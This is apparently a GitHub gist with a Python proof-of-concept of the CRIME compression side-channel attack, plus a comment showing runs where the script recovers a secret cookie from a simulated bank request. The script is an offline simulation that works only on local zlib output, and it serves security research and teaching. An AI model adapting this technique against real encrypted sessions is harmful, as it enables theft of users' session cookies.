Skip to content

Instantly share code, notes, and snippets.

@stamparm stamparm/crime.py forked from koto/crime.py
Created Sep 11, 2012

Embed
What would you like to do?
It's not a crime to build a CRIME
# This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do
# Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz
# http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/
import string
import zlib
import sys
import random
charset = string.letters + string.digits + "%/+="
COOKIE = ''.join(random.choice(charset) for x in range(30))
HEADERS = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret=" + COOKIE + "\r\n"
"Accept-Encoding: gzip,deflate,sdch\r\n"
"Accept-Language: en-US,en;q=0.8\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
"\r\n")
BODY = ("\r\nCookie: secret="
)
BODY_SUFFIX=("\r\n"
"Accept-Encoding: gzip,deflate,sdch\r\n"
"Accept-Language: en-US,en;q=0.8\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
"\r\n")
cookie = ""
def compress(data):
c = zlib.compressobj()
return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
def findnext(b,bs,charset):
original_length = len(compress(HEADERS + b + bs))
lengths = []
for c in charset:
length = len(compress(HEADERS +
b +
c +
bs))
lengths.append((c, length))
min_length = min(_[1] for _ in lengths)
possible_chars = [_[0] for _ in filter(lambda _: _[1] == min_length, lengths)]
return possible_chars
def exit():
print "Original cookie: %s" % COOKIE
print "Leaked cookie : %s" % cookie
sys.exit(1)
def forward():
global cookie
while len(cookie) < len(COOKIE):
chop = 1
possible_chars = findnext(BODY + cookie, "", charset)
body_tmp = BODY
orig = possible_chars
while not len(possible_chars) == 1:
if len(body_tmp) < chop:
#print "stuck at", possible_chars
return False
body_tmp = body_tmp[chop:]
possible_chars = findnext(body_tmp + cookie, "", orig)
cookie = cookie + possible_chars[0]
return True
while BODY.find("\r\n") >= 0:
if not forward():
cookie = cookie[:-1]
if len(cookie) >= len(COOKIE):
exit()
print "reducing body"
BODY = BODY[BODY.find("\r\n") + 2:]
exit()
@koto

This comment has been minimized.

Copy link

koto commented Sep 11, 2012

That's how I started, but I had mixed results with the body shortened, same with your script:

kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: i69ZmP8FQsKdav5F7Y7A+8N9TDq%5B
Leaked cookie : i69ZmP8FQsKdav5F7Y7A+8N9TDq%5B
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: QoOQUSX6Tww9Cl8YMGr9MdYxy3kpVZ
Leaked cookie : Qo
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: G4xbSyl%8R43i1q0o3jDtDmyPVXrtV
Leaked cookie : G4xbSyl%8R43i1q0o3jDtDmyPVXrtV
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
Original cookie: txA7GVLs2UXSP1B8KL2uibAgXXGE%k
Leaked cookie : txA7GVLs2UXSP1B8KL2uibAgXXGE%k
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: ipypF02hb1t7//G0Yx099mUNKU/Bx6
Leaked cookie : i4ee
kotomb:gist3698401-5d2a00a6d2a730c976cfd934c810273e384744f8 koto$ python crime.py
reducing body
Original cookie: eD2Mxfol4X1jddetaFn9QQvRXCE89A
Leaked cookie : eD2N

with longer body it practically detects the whole cookie everytime.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.